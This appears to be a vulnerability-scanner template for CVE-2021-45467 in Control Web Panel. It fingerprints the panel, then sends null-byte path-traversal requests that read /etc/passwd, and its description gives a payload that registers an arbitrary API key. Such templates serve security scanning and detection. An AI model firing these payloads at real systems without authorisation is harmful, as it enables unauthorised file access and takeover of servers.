id: CVE-2021-45467

info:
  name: Control Web Panel (CWP) - File Inclusion
  author: ritikchaddha
  severity: critical
  description: |
    In CWP (Control Web Panel, previously CentOS Web Panel) before version 0.9.8.1107, an unauthenticated attacker can abuse null byte (%00) injection with the "scripts" parameter in the /user/loader.php or /user/login.php endpoints to register arbitrary API keys or access sensitive files. This can be exploited by using multiple %00 sequences to traverse directories via crafted requests such as /user/loader.php?api=1&scripts=.%00./.%00./api/account_new_create&acc=guadaapi, or similar payloads with more %00 instances (e.g., .%00%00%00./.%00%00%00./api/account_new_create). Attackers may use this flaw for arbitrary file access, privilege escalation, or remote code execution.
  impact: |
    A remote, unauthenticated attacker can leverage this vulnerability to register arbitrary API keys, access sensitive files (such as /etc/passwd), and potentially achieve remote code execution. Successful exploitation results in full compromise of the web panel and host system, allowing for exposure of confidential data, server takeover, and further attacks on internal infrastructure.
  remediation: |
    Update to version 0.9.8.1107 or later to fix input validation issues.
  reference:
    - https://octagon.net/blog/2022/01/22/cve-2021-45467-cwp-centos-web-panel-preauth-rce/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-45467
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-45467
    epss-score: 0.88128
    epss-percentile: 0.99502
    cwe-id: CWE-862
    cpe: cpe:2.3:a:control-webpanel:webpanel:*:*:*:*:*:*:*:*
  metadata:
    verified: false
    max-request: 5
    vendor: control_webpanel
    product: webpanel
    fofa-query: icon_hash="-356182173"
  tags: cve,cve2021,cwp,rce,lfi,centos,webpanel,vkev

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/login/cwp_theme/original/img/ico/favicon.ico"
      - "{{BaseURL}}/login/design/img/ico/favicon.ico"
      - "{{BaseURL}}"

    redirects: true
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "status_code==200 && ('-356182173' == mmh3(base64_py(body)))"
          - "status_code==200 && contains_any(tolower(body), 'control webpanel', 'cwp | user')"
        condition: or
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/user/index.php?api=1&scripts=.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./etc/passwd"
      - "{{BaseURL}}/user/login.php?api=1&scripts=.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./etc/passwd"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201f07a5d36856bfc24db03f3d0106feb8b923ca9b96bd02d2d7bdece48f0f47e3022100dcf88dcea64f7ce1dcaca97d1051563297c7ffb0e6c0d6c4fd993e32c4356bd3:922c64590222798bb761d5b6d8e72950